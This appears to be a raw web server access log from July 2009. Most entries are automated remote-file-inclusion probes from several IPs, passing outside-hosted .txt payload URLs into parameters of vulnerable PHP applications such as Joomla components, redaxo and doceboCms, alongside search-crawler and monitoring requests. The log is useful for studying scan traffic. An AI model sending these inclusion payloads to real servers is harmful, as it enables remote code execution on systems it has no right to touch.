65.254.32.2 - - [12/Jul/2009:05:58:11 -0400] "GET /logs/access_log.Q109053100%20%20//modules/errors.php?error=http://www.smilewig.com/bbs/chase/images/remember.txt????????? HTTP/1.1" 404 246 "-" "Mozilla/5.0"
65.254.32.2 - - [12/Jul/2009:05:58:11 -0400] "GET /logs//modules/errors.php?error=http://www.smilewig.com/bbs/chase/images/remember.txt????????? HTTP/1.1" 404 222 "-" "Mozilla/5.0"
209.59.12.99 - - [12/Jul/2009:05:58:15 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
124.0.145.1 - - [12/Jul/2009:05:58:50 -0400] "GET /logs/access_log.Q109062100%20%20//modules/errors.php?error=http://www.qting.co.kr/main/ucc/files/zfxid.txt?? HTTP/1.1" 404 246 "-" "Mozilla/5.0"
65.254.32.2 - - [12/Jul/2009:05:58:52 -0400] "GET /logs/access_log.Q109070800%20%20//modules/errors.php?error=http://www.smilewig.com/bbs/chase/images/remember.txt????????? HTTP/1.1" 404 246 "-" "Mozilla/5.0"
66.11.230.36 - - [12/Jul/2009:05:59:33 -0400] "GET /logs/access_log.Q109062100%20%20//modules/errors.php?error=http://www.qting.co.kr/main/ucc/files/zfxid.txt?? HTTP/1.1" 404 246 "-" "Mozilla/5.0"
65.254.32.2 - - [12/Jul/2009:05:59:43 -0400] "GET /logs/access_log.Q109062100%20%20//modules/errors.php?error=http://www.smilewig.com/bbs/chase/images/remember.txt????????? HTTP/1.1" 404 246 "-" "Mozilla/5.0"
72.30.142.177 - - [12/Jul/2009:06:01:14 -0400] "GET /logs/access_log.Q108021500 HTTP/1.0" 404 224 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
211.236.242.164 - - [12/Jul/2009:06:01:44 -0400] "GET /logs/access_log.Q109061800//doceboCms/class/class.dashboard_cms.php?where_framework=http://jst.or.th/index1.txt? HTTP/1.1" 404 265 "-" "Mozilla/5.0"
211.236.242.164 - - [12/Jul/2009:06:01:45 -0400] "GET //doceboCms/class/class.dashboard_cms.php?where_framework=http://jst.or.th/index1.txt? HTTP/1.1" 404 238 "-" "Mozilla/5.0"
209.59.12.99 - - [12/Jul/2009:06:03:16 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
66.249.68.247 - - [12/Jul/2009:06:03:59 -0400] "GET /cgi-bin/LANSAWEB?PROCFUN+WORDPR01+PRTSRCH+M37+FUNCPARMS+WEBCMP(S0020):1+WEBSSN(A0240):L0134104901A4C6006E41011+WEBSEQ(S0020):1+WEBPGN(S0070):177328+WEBID(S0020):1+WEBKEY(A0100):PRTITEMS HTTP/1.1" 200 35351 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.11.230.36 - - [12/Jul/2009:06:04:37 -0400] "GET //index.php?option=com_custompages&cpage=http://www.qting.co.kr/main/ucc/files/zfxid.txt?? HTTP/1.1" 404 208 "-" "Mozilla/5.0"
66.11.230.36 - - [12/Jul/2009:06:04:37 -0400] "GET /logs//index.php?option=com_custompages&cpage=http://www.qting.co.kr/main/ucc/files/zfxid.txt?? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
66.11.230.36 - - [12/Jul/2009:06:04:37 -0400] "GET /logs/access_log.Q109051400//index.php?option=com_custompages&cpage=http://www.qting.co.kr/main/ucc/files/zfxid.txt?? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
66.11.230.36 - - [12/Jul/2009:06:04:43 -0400] "GET /logs/access_log.Q109052300//index.php?option=com_custompages&cpage=http://www.qting.co.kr/main/ucc/files/zfxid.txt?? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
66.11.230.36 - - [12/Jul/2009:06:05:16 -0400] "GET /logs/access_log.Q109051400%20%20//index.php?option=com_custompages&cpage=http://www.qting.co.kr/main/ucc/files/zfxid.txt?? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
66.11.230.36 - - [12/Jul/2009:06:05:18 -0400] "GET /logs/access_log.Q109052300%20%20//index.php?option=com_custompages&cpage=http://www.qting.co.kr/main/ucc/files/zfxid.txt?? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
124.0.145.1 - - [12/Jul/2009:06:05:38 -0400] "GET /logs/access_log.Q109053100//modules/errors.php?error=http://www.qting.co.kr/main/ucc/files/zfxid.txt?? HTTP/1.1" 404 244 "-" "Mozilla/5.0"
124.0.145.1 - - [12/Jul/2009:06:05:43 -0400] "GET /logs/access_log.Q109052200//include/lib.inc.php?site_path=http://www.qting.co.kr/main/ucc/files/zfxid.txt?? HTTP/1.1" 404 245 "-" "Mozilla/5.0"
124.0.145.1 - - [12/Jul/2009:06:06:01 -0400] "GET /logs/access_log.Q109061700//include/lib.inc.php?site_path=http://www.qting.co.kr/main/ucc/files/zfxid.txt?? HTTP/1.1" 404 245 "-" "Mozilla/5.0"
213.222.13.89 - - [12/Jul/2009:06:06:05 -0400] "GET /logs/access_log.Q109052100//admin/editor2/spaw_control.class.php?spaw_root=http://83.3.132.70/iGeoMap/www//tmp/r0x-id.txt? HTTP/1.1" 404 262 "-" "libwww-perl/5.79"
65.55.105.230 - - [12/Jul/2009:06:06:20 -0400] "GET /logs/access_log.Q107071400 HTTP/1.1" 404 224 "-" "msnbot/1.1 (+http://search.msn.com/msnbot.htm)"
121.78.226.120 - - [12/Jul/2009:06:08:10 -0400] "GET /logs//redaxo/include/functions.inc.php?REX[INCLUDE_PATH]=http://5euroshirts.com/modules/test.txt??? HTTP/1.1" 404 236 "-" "Mozilla/4.0 (compatible; MSIE 4.01; Windows CE; PPC; 240x320)"
121.78.226.120 - - [12/Jul/2009:06:08:13 -0400] "GET //redaxo/include/functions.inc.php?REX[INCLUDE_PATH]=http://5euroshirts.com/modules/test.txt??? HTTP/1.1" 404 231 "-" "Mozilla/4.0 (compatible; MSIE 4.01; Windows CE; PPC; 240x320)"
209.59.12.99 - - [12/Jul/2009:06:08:16 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
220.231.126.252 - - [12/Jul/2009:06:08:31 -0400] "GET /logs/?_SERVER[DOCUMENT_ROOT]=http://ohmyflash.com/bbs/data/text/idade1.txt??? HTTP/1.1" 200 9190 "-" "Mozilla/5.0"
220.231.126.252 - - [12/Jul/2009:06:08:31 -0400] "GET /?_SERVER[DOCUMENT_ROOT]=http://ohmyflash.com/bbs/data/text/idade1.txt??? HTTP/1.1" 200 409 "-" "Mozilla/5.0"
220.231.126.252 - - [12/Jul/2009:06:08:31 -0400] "GET /logs/access_log.Q109051200%20%20/?_SERVER[DOCUMENT_ROOT]=http://ohmyflash.com/bbs/data/text/idade1.txt??? HTTP/1.1" 404 227 "-" "Mozilla/5.0"
124.0.145.1 - - [12/Jul/2009:06:08:37 -0400] "GET /logs//index.php?option=com_custompages&cpage=http://www.qting.co.kr/main/ucc/files/zfxid.txt?? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
124.0.145.1 - - [12/Jul/2009:06:08:37 -0400] "GET //index.php?option=com_custompages&cpage=http://www.qting.co.kr/main/ucc/files/zfxid.txt?? HTTP/1.1" 404 208 "-" "Mozilla/5.0"
124.0.145.1 - - [12/Jul/2009:06:08:37 -0400] "GET /logs/access_log.Q109051400%20%20//index.php?option=com_custompages&cpage=http://www.qting.co.kr/main/ucc/files/zfxid.txt?? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
65.254.32.2 - - [12/Jul/2009:06:08:42 -0400] "GET /logs/access_log.Q109061700//include/lib.inc.php?site_path=http://www.smilewig.com/bbs/chase/images/remember.txt????????? HTTP/1.1" 404 245 "-" "Mozilla/5.0"
124.0.145.1 - - [12/Jul/2009:06:08:52 -0400] "GET /logs/access_log.Q109052300%20%20//index.php?option=com_custompages&cpage=http://www.qting.co.kr/main/ucc/files/zfxid.txt?? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
222.236.47.188 - - [12/Jul/2009:06:09:21 -0400] "GET //index.php?option=com_custompages&cpage=http://www.qting.co.kr/main/ucc/files/zfxid.txt?? HTTP/1.1" 404 208 "-" "Mozilla/5.0"
222.236.47.188 - - [12/Jul/2009:06:09:21 -0400] "GET /logs//index.php?option=com_custompages&cpage=http://www.qting.co.kr/main/ucc/files/zfxid.txt?? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
222.236.47.188 - - [12/Jul/2009:06:09:21 -0400] "GET /logs/access_log.Q109051400%20%20//index.php?option=com_custompages&cpage=http://www.qting.co.kr/main/ucc/files/zfxid.txt?? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
220.231.126.252 - - [12/Jul/2009:06:09:50 -0400] "GET /?_SERVER[DOCUMENT_ROOT]=http://web-master.kiev.ua/rubmsubmitter/rubmsubmitter/style/pts/idade1.txt??? HTTP/1.1" 200 409 "-" "Mozilla/5.0"
220.231.126.252 - - [12/Jul/2009:06:09:50 -0400] "GET /logs/access_log.Q109051200%20%20/?_SERVER[DOCUMENT_ROOT]=http://web-master.kiev.ua/rubmsubmitter/rubmsubmitter/style/pts/idade1.txt??? HTTP/1.1" 404 227 "-" "Mozilla/5.0"
220.231.126.252 - - [12/Jul/2009:06:09:51 -0400] "GET /logs/?_SERVER[DOCUMENT_ROOT]=http://web-master.kiev.ua/rubmsubmitter/rubmsubmitter/style/pts/idade1.txt??? HTTP/1.1" 200 9190 "-" "Mozilla/5.0"
222.236.47.188 - - [12/Jul/2009:06:10:01 -0400] "GET /logs/access_log.Q109052300%20%20//index.php?option=com_custompages&cpage=http://www.qting.co.kr/main/ucc/files/zfxid.txt?? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
222.236.47.188 - - [12/Jul/2009:06:11:57 -0400] "GET //modules/errors.php?error=http://www.qting.co.kr/main/ucc/files/zfxid.txt?? HTTP/1.1" 404 217 "-" "Mozilla/5.0"
222.236.47.188 - - [12/Jul/2009:06:11:57 -0400] "GET /logs//modules/errors.php?error=http://www.qting.co.kr/main/ucc/files/zfxid.txt?? HTTP/1.1" 404 222 "-" "Mozilla/5.0"
222.236.47.188 - - [12/Jul/2009:06:12:12 -0400] "GET /logs/access_log.Q109053100//modules/errors.php?error=http://www.qting.co.kr/main/ucc/files/zfxid.txt?? HTTP/1.1" 404 244 "-" "Mozilla/5.0"
222.236.47.188 - - [12/Jul/2009:06:12:18 -0400] "GET //include/lib.inc.php?site_path=http://www.qting.co.kr/main/ucc/files/zfxid.txt?? HTTP/1.1" 404 218 "-" "Mozilla/5.0"
222.236.47.188 - - [12/Jul/2009:06:12:18 -0400] "GET /logs//include/lib.inc.php?site_path=http://www.qting.co.kr/main/ucc/files/zfxid.txt?? HTTP/1.1" 404 223 "-" "Mozilla/5.0"
222.236.47.188 - - [12/Jul/2009:06:12:18 -0400] "GET /logs/access_log.Q109052200//include/lib.inc.php?site_path=http://www.qting.co.kr/main/ucc/files/zfxid.txt?? HTTP/1.1" 404 245 "-" "Mozilla/5.0"
222.236.47.188 - - [12/Jul/2009:06:12:22 -0400] "GET /logs/access_log.Q109062100//modules/errors.php?error=http://www.qting.co.kr/main/ucc/files/zfxid.txt?? HTTP/1.1" 404 244 "-" "Mozilla/5.0"
222.236.47.188 - - [12/Jul/2009:06:12:37 -0400] "GET /logs/access_log.Q109061700//include/lib.inc.php?site_path=http://www.qting.co.kr/main/ucc/files/zfxid.txt?? HTTP/1.1" 404 245 "-" "Mozilla/5.0"
124.0.54.130 - - [12/Jul/2009:06:13:09 -0400] "GET /logs/access_log.Q109052600%20//redaxo/include/functions.inc.php?REX[INCLUDE_PATH]=http://for.caucasus.net/id.txt???? HTTP/1.1" 404 259 "-" "libwww-perl/5.79"
124.0.54.130 - - [12/Jul/2009:06:13:09 -0400] "GET /logs//redaxo/include/functions.inc.php?REX[INCLUDE_PATH]=http://for.caucasus.net/id.txt???? HTTP/1.1" 404 236 "-" "libwww-perl/5.79"
124.0.54.130 - - [12/Jul/2009:06:13:09 -0400] "GET //redaxo/include/functions.inc.php?REX[INCLUDE_PATH]=http://for.caucasus.net/id.txt???? HTTP/1.1" 404 231 "-" "libwww-perl/5.79"
124.0.54.130 - - [12/Jul/2009:06:13:16 -0400] "GET //redaxo/include/functions.inc.php?REX[INCLUDE_PATH]=http://for.caucasus.net/id.txt???? HTTP/1.1" 404 231 "-" "libwww-perl/5.79"
124.0.54.130 - - [12/Jul/2009:06:13:16 -0400] "GET /logs/access_log.Q109052600//redaxo/include/functions.inc.php?REX[INCLUDE_PATH]=http://for.caucasus.net/id.txt???? HTTP/1.1" 404 258 "-" "libwww-perl/5.79"
124.0.54.130 - - [12/Jul/2009:06:13:16 -0400] "GET /logs//redaxo/include/functions.inc.php?REX[INCLUDE_PATH]=http://for.caucasus.net/id.txt???? HTTP/1.1" 404 236 "-" "libwww-perl/5.79"
209.59.12.99 - - [12/Jul/2009:06:13:17 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
124.0.54.130 - - [12/Jul/2009:06:13:30 -0400] "GET /logs/access_log.Q109052800//redaxo/include/functions.inc.php?REX[INCLUDE_PATH]=http://for.caucasus.net/id.txt???? HTTP/1.1" 404 258 "-" "libwww-perl/5.79"
65.254.32.2 - - [12/Jul/2009:06:13:42 -0400] "GET /logs/access_log.Q109052200//include/lib.inc.php?site_path=http://www.smilewig.com/bbs/chase/images/remember.txt????????? HTTP/1.1" 404 245 "-" "Mozilla/5.0"
65.254.32.2 - - [12/Jul/2009:06:13:45 -0400] "GET /logs/access_log.Q109062100//modules/errors.php?error=http://www.smilewig.com/bbs/chase/images/remember.txt????????? HTTP/1.1" 404 244 "-" "Mozilla/5.0"
65.254.32.2 - - [12/Jul/2009:06:13:46 -0400] "GET /logs/access_log.Q109053100//modules/errors.php?error=http://www.smilewig.com/bbs/chase/images/remember.txt????????? HTTP/1.1" 404 244 "-" "Mozilla/5.0"
72.30.142.177 - - [12/Jul/2009:06:13:56 -0400] "GET /logs/error_log.Q109012500 HTTP/1.0" 404 223 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
72.30.142.177 - - [12/Jul/2009:06:15:10 -0400] "GET /ACE.html HTTP/1.0" 200 5877 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
65.254.32.2 - - [12/Jul/2009:06:15:31 -0400] "GET /logs//index.php?option=com_custompages&cpage=http://www.smilewig.com/bbs/chase/images/remember.txt????????? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
65.254.32.2 - - [12/Jul/2009:06:15:31 -0400] "GET /logs/access_log.Q109051400%20%20//index.php?option=com_custompages&cpage=http://www.smilewig.com/bbs/chase/images/remember.txt????????? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
65.254.32.2 - - [12/Jul/2009:06:15:31 -0400] "GET //index.php?option=com_custompages&cpage=http://www.smilewig.com/bbs/chase/images/remember.txt????????? HTTP/1.1" 404 208 "-" "Mozilla/5.0"
124.0.54.130 - - [12/Jul/2009:06:15:40 -0400] "GET /logs/access_log.Q109052600//redaxo/include/functions.inc.php?REX[INCLUDE_PATH]=http://for.caucasus.net/id.txt???? HTTP/1.1" 404 258 "-" "libwww-perl/5.79"
65.254.32.2 - - [12/Jul/2009:06:15:49 -0400] "GET /logs/access_log.Q109052300%20%20//index.php?option=com_custompages&cpage=http://www.smilewig.com/bbs/chase/images/remember.txt????????? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
110.45.146.223 - - [12/Jul/2009:06:15:50 -0400] "GET /logs/access_log.Q109052600%20//redaxo/include/functions.inc.php?REX[INCLUDE_PATH]=http://for.caucasus.net/id.txt???? HTTP/1.1" 404 259 "-" "libwww-perl/5.79"
110.45.146.223 - - [12/Jul/2009:06:15:50 -0400] "GET /logs//redaxo/include/functions.inc.php?REX[INCLUDE_PATH]=http://for.caucasus.net/id.txt???? HTTP/1.1" 404 236 "-" "libwww-perl/5.79"
110.45.146.223 - - [12/Jul/2009:06:15:50 -0400] "GET //redaxo/include/functions.inc.php?REX[INCLUDE_PATH]=http://for.caucasus.net/id.txt???? HTTP/1.1" 404 231 "-" "libwww-perl/5.79"
110.45.146.223 - - [12/Jul/2009:06:15:52 -0400] "GET /logs/access_log.Q109052600%20//redaxo/include/functions.inc.php?REX[INCLUDE_PATH]=http://for.caucasus.net/id.txt???? HTTP/1.1" 404 259 "-" "libwww-perl/5.79"
110.45.146.223 - - [12/Jul/2009:06:15:52 -0400] "GET //redaxo/include/functions.inc.php?REX[INCLUDE_PATH]=http://for.caucasus.net/id.txt???? HTTP/1.1" 404 231 "-" "libwww-perl/5.79"
110.45.146.223 - - [12/Jul/2009:06:15:52 -0400] "GET /logs//redaxo/include/functions.inc.php?REX[INCLUDE_PATH]=http://for.caucasus.net/id.txt???? HTTP/1.1" 404 236 "-" "libwww-perl/5.79"
124.0.54.130 - - [12/Jul/2009:06:15:52 -0400] "GET /logs/access_log.Q109052800//redaxo/include/functions.inc.php?REX[INCLUDE_PATH]=http://for.caucasus.net/id.txt???? HTTP/1.1" 404 258 "-" "libwww-perl/5.79"
66.249.68.70 - - [12/Jul/2009:06:16:19 -0400] "GET /images/items/2000107_thumb.jpg HTTP/1.1" 200 2246 "-" "Googlebot-Image/1.0"
110.45.146.223 - - [12/Jul/2009:06:16:27 -0400] "GET /logs/access_log.Q109052600//redaxo/include/functions.inc.php?REX[INCLUDE_PATH]=http://for.caucasus.net/id.txt???? HTTP/1.1" 404 258 "-" "libwww-perl/5.79"
110.45.146.223 - - [12/Jul/2009:06:16:28 -0400] "GET /logs/access_log.Q109052600//redaxo/include/functions.inc.php?REX[INCLUDE_PATH]=http://for.caucasus.net/id.txt???? HTTP/1.1" 404 258 "-" "libwww-perl/5.79"
110.45.146.223 - - [12/Jul/2009:06:16:30 -0400] "GET /logs/access_log.Q109052800//redaxo/include/functions.inc.php?REX[INCLUDE_PATH]=http://for.caucasus.net/id.txt???? HTTP/1.1" 404 258 "-" "libwww-perl/5.79"
110.45.146.223 - - [12/Jul/2009:06:16:35 -0400] "GET /logs/access_log.Q109052800//redaxo/include/functions.inc.php?REX[INCLUDE_PATH]=http://for.caucasus.net/id.txt???? HTTP/1.1" 404 258 "-" "libwww-perl/5.79"
213.192.241.94 - - [12/Jul/2009:06:17:16 -0400] "GET /logs/access_log.Q109052600//redaxo/include/functions.inc.php?REX[INCLUDE_PATH]=http://for.caucasus.net/id.txt???? HTTP/1.1" 404 258 "-" "libwww-perl/5.803"
213.192.241.94 - - [12/Jul/2009:06:17:16 -0400] "GET //redaxo/include/functions.inc.php?REX[INCLUDE_PATH]=http://for.caucasus.net/id.txt???? HTTP/1.1" 404 231 "-" "libwww-perl/5.803"
213.192.241.94 - - [12/Jul/2009:06:17:16 -0400] "GET /logs//redaxo/include/functions.inc.php?REX[INCLUDE_PATH]=http://for.caucasus.net/id.txt???? HTTP/1.1" 404 236 "-" "libwww-perl/5.803"
213.192.241.94 - - [12/Jul/2009:06:17:25 -0400] "GET /logs/access_log.Q109052800//redaxo/include/functions.inc.php?REX[INCLUDE_PATH]=http://for.caucasus.net/id.txt???? HTTP/1.1" 404 258 "-" "libwww-perl/5.803"
211.236.242.164 - - [12/Jul/2009:06:17:27 -0400] "GET /logs/access_log.Q109051600//doceboCms/class/class.dashboard_cms.php?where_framework=http://jst.or.th/index1.txt? HTTP/1.1" 404 265 "-" "Mozilla/5.0"
213.192.241.94 - - [12/Jul/2009:06:17:51 -0400] "GET /logs/access_log.Q109052600//redaxo/include/functions.inc.php?REX[INCLUDE_PATH]=http://for.caucasus.net/id.txt???? HTTP/1.1" 404 258 "-" "libwww-perl/5.803"
213.192.241.94 - - [12/Jul/2009:06:17:51 -0400] "GET /logs//redaxo/include/functions.inc.php?REX[INCLUDE_PATH]=http://for.caucasus.net/id.txt???? HTTP/1.1" 404 236 "-" "libwww-perl/5.803"
213.192.241.94 - - [12/Jul/2009:06:17:53 -0400] "GET //redaxo/include/functions.inc.php?REX[INCLUDE_PATH]=http://for.caucasus.net/id.txt???? HTTP/1.1" 404 231 "-" "libwww-perl/5.803"
213.192.241.94 - - [12/Jul/2009:06:18:00 -0400] "GET /logs/access_log.Q109052800//redaxo/include/functions.inc.php?REX[INCLUDE_PATH]=http://for.caucasus.net/id.txt???? HTTP/1.1" 404 258 "-" "libwww-perl/5.803"
209.59.12.99 - - [12/Jul/2009:06:18:18 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
65.254.32.2 - - [12/Jul/2009:06:18:33 -0400] "GET /logs/access_log.Q109051400//index.php?option=com_custompages&cpage=http://www.smilewig.com/bbs/chase/images/remember.txt????????? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
65.254.32.2 - - [12/Jul/2009:06:18:33 -0400] "GET /logs/access_log.Q109052300//index.php?option=com_custompages&cpage=http://www.smilewig.com/bbs/chase/images/remember.txt????????? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
59.22.140.17 - - [12/Jul/2009:06:18:43 -0400] "GET /logs/access_log.Q109052600//redaxo/include/functions.inc.php?REX[INCLUDE_PATH]=http://for.caucasus.net/id.txt???? HTTP/1.1" 404 258 "-" "libwww-perl/5.79"
59.22.140.17 - - [12/Jul/2009:06:18:43 -0400] "GET //redaxo/include/functions.inc.php?REX[INCLUDE_PATH]=http://for.caucasus.net/id.txt???? HTTP/1.1" 404 231 "-" "libwww-perl/5.79"
59.22.140.17 - - [12/Jul/2009:06:18:43 -0400] "GET /logs//redaxo/include/functions.inc.php?REX[INCLUDE_PATH]=http://for.caucasus.net/id.txt???? HTTP/1.1" 404 236 "-" "libwww-perl/5.79"
59.22.140.17 - - [12/Jul/2009:06:19:19 -0400] "GET /logs/access_log.Q109052800//redaxo/include/functions.inc.php?REX[INCLUDE_PATH]=http://for.caucasus.net/id.txt???? HTTP/1.1" 404 258 "-" "libwww-perl/5.79"
213.192.241.94 - - [12/Jul/2009:06:19:54 -0400] "GET /logs/access_log.Q109052600%20//redaxo/include/functions.inc.php?REX[INCLUDE_PATH]=http://for.caucasus.net/id.txt???? HTTP/1.1" 404 259 "-" "libwww-perl/5.803"
213.192.241.94 - - [12/Jul/2009:06:20:01 -0400] "GET /logs/access_log.Q109052600%20//redaxo/include/functions.inc.php?REX[INCLUDE_PATH]=http://for.caucasus.net/id.txt???? HTTP/1.1" 404 259 "-" "libwww-perl/5.803"
59.22.140.17 - - [12/Jul/2009:06:21:24 -0400] "GET /logs/access_log.Q109052600//redaxo/include/functions.inc.php?REX[INCLUDE_PATH]=http://for.caucasus.net/id.txt???? HTTP/1.1" 404 258 "-" "libwww-perl/5.79"
59.22.140.17 - - [12/Jul/2009:06:21:24 -0400] "GET //redaxo/include/functions.inc.php?REX[INCLUDE_PATH]=http://for.caucasus.net/id.txt???? HTTP/1.1" 404 231 "-" "libwww-perl/5.79"
59.22.140.17 - - [12/Jul/2009:06:21:24 -0400] "GET /logs//redaxo/include/functions.inc.php?REX[INCLUDE_PATH]=http://for.caucasus.net/id.txt???? HTTP/1.1" 404 236 "-" "libwww-perl/5.79"
59.22.140.17 - - [12/Jul/2009:06:22:08 -0400] "GET /logs/access_log.Q109052800//redaxo/include/functions.inc.php?REX[INCLUDE_PATH]=http://for.caucasus.net/id.txt???? HTTP/1.1" 404 258 "-" "libwww-perl/5.79"
209.59.12.99 - - [12/Jul/2009:06:23:17 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
59.22.140.17 - - [12/Jul/2009:06:23:40 -0400] "GET /logs/access_log.Q109052600%20//redaxo/include/functions.inc.php?REX[INCLUDE_PATH]=http://for.caucasus.net/id.txt???? HTTP/1.1" 404 259 "-" "libwww-perl/5.79"
93.158.137.122 - - [12/Jul/2009:06:23:49 -0400] "GET / HTTP/1.1" 200 409 "-" "Yandex/1.01.001 (compatible; Win16; I)"
222.236.47.188 - - [12/Jul/2009:06:24:14 -0400] "GET /logs/access_log.Q109052300//index.php?option=com_custompages&cpage=http://www.qting.co.kr/main/ucc/files/zfxid.txt?? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
222.236.47.188 - - [12/Jul/2009:06:24:14 -0400] "GET /logs/access_log.Q109051400//index.php?option=com_custompages&cpage=http://www.qting.co.kr/main/ucc/files/zfxid.txt?? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
72.30.142.177 - - [12/Jul/2009:06:25:30 -0400] "GET /logs/access_log.Q108033000 HTTP/1.0" 404 224 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
124.0.145.1 - - [12/Jul/2009:06:25:32 -0400] "GET /logs/access_log.Q109051400//index.php?option=com_custompages&cpage=http://www.qting.co.kr/main/ucc/files/zfxid.txt?? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
124.0.145.1 - - [12/Jul/2009:06:25:32 -0400] "GET /logs/access_log.Q109052300//index.php?option=com_custompages&cpage=http://www.qting.co.kr/main/ucc/files/zfxid.txt?? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
211.236.242.164 - - [12/Jul/2009:06:26:05 -0400] "GET //components/com_pccookbook/pccookbook.php?mosConfig_absolute_path=http://jst.or.th/index1.txt? HTTP/1.1" 404 239 "-" "Mozilla/5.0"
211.236.242.164 - - [12/Jul/2009:06:26:06 -0400] "GET /logs/access_log.Q109052200//components/com_pccookbook/pccookbook.php?mosConfig_absolute_path=http://jst.or.th/index1.txt? HTTP/1.1" 404 266 "-" "Mozilla/5.0"
211.236.242.164 - - [12/Jul/2009:06:26:06 -0400] "GET /logs//components/com_pccookbook/pccookbook.php?mosConfig_absolute_path=http://jst.or.th/index1.txt? HTTP/1.1" 404 244 "-" "Mozilla/5.0"
211.236.242.164 - - [12/Jul/2009:06:26:10 -0400] "GET /logs/access_log.Q109061500//components/com_pccookbook/pccookbook.php?mosConfig_absolute_path=http://jst.or.th/index1.txt? HTTP/1.1" 404 266 "-" "Mozilla/5.0"
211.236.242.164 - - [12/Jul/2009:06:26:14 -0400] "GET //components/com_pccookbook/pccookbook.php?mosConfig_absolute_path=http://jst.or.th/index1.txt? HTTP/1.1" 404 239 "-" "Mozilla/5.0"
211.236.242.164 - - [12/Jul/2009:06:26:15 -0400] "GET /logs/access_log.Q109052200//components/com_pccookbook/pccookbook.php?mosConfig_absolute_path=http://jst.or.th/index1.txt? HTTP/1.1" 404 266 "-" "Mozilla/5.0"
211.236.242.164 - - [12/Jul/2009:06:26:16 -0400] "GET /logs//components/com_pccookbook/pccookbook.php?mosConfig_absolute_path=http://jst.or.th/index1.txt? HTTP/1.1" 404 244 "-" "Mozilla/5.0"
59.22.140.17 - - [12/Jul/2009:06:26:17 -0400] "GET /logs/access_log.Q109052600%20//redaxo/include/functions.inc.php?REX[INCLUDE_PATH]=http://for.caucasus.net/id.txt???? HTTP/1.1" 404 259 "-" "libwww-perl/5.79"
211.236.242.164 - - [12/Jul/2009:06:26:19 -0400] "GET /logs/access_log.Q109061500//components/com_pccookbook/pccookbook.php?mosConfig_absolute_path=http://jst.or.th/index1.txt? HTTP/1.1" 404 266 "-" "Mozilla/5.0"
124.0.54.130 - - [12/Jul/2009:06:26:36 -0400] "GET /logs/access_log.Q109052600%20//redaxo/include/functions.inc.php?REX[INCLUDE_PATH]=http://for.caucasus.net/id.txt???? HTTP/1.1" 404 259 "-" "libwww-perl/5.79"
89.234.63.107 - - [12/Jul/2009:06:27:44 -0400] "GET /logs/access_log.Q109052100//cropcanvas.php?cropimagedir=http://dfpyvu.mxl.uabc.mx/trash/idxx.txt?? HTTP/1.1" 404 240 "-" "Mozilla/5.0"
89.234.63.107 - - [12/Jul/2009:06:27:44 -0400] "GET /logs//cropcanvas.php?cropimagedir=http://dfpyvu.mxl.uabc.mx/trash/idxx.txt?? HTTP/1.1" 404 218 "-" "Mozilla/5.0"
89.234.63.107 - - [12/Jul/2009:06:27:44 -0400] "GET //cropcanvas.php?cropimagedir=http://dfpyvu.mxl.uabc.mx/trash/idxx.txt?? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
89.234.63.107 - - [12/Jul/2009:06:27:44 -0400] "GET //cropcanvas.php?cropimagedir=http://dfpyvu.mxl.uabc.mx/trash/idxx.txt?? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
89.234.63.107 - - [12/Jul/2009:06:27:44 -0400] "GET /logs/access_log.Q109052100//cropcanvas.php?cropimagedir=http://dfpyvu.mxl.uabc.mx/trash/idxx.txt?? HTTP/1.1" 404 240 "-" "Mozilla/5.0"
89.234.63.107 - - [12/Jul/2009:06:27:44 -0400] "GET /logs//cropcanvas.php?cropimagedir=http://dfpyvu.mxl.uabc.mx/trash/idxx.txt?? HTTP/1.1" 404 218 "-" "Mozilla/5.0"
89.234.63.107 - - [12/Jul/2009:06:27:49 -0400] "GET /logs/access_log.Q109053000//cropcanvas.php?cropimagedir=http://dfpyvu.mxl.uabc.mx/trash/idxx.txt?? HTTP/1.1" 404 240 "-" "Mozilla/5.0"
89.234.63.107 - - [12/Jul/2009:06:27:49 -0400] "GET /logs/access_log.Q109053000//cropcanvas.php?cropimagedir=http://dfpyvu.mxl.uabc.mx/trash/idxx.txt?? HTTP/1.1" 404 240 "-" "Mozilla/5.0"
209.59.12.99 - - [12/Jul/2009:06:28:18 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
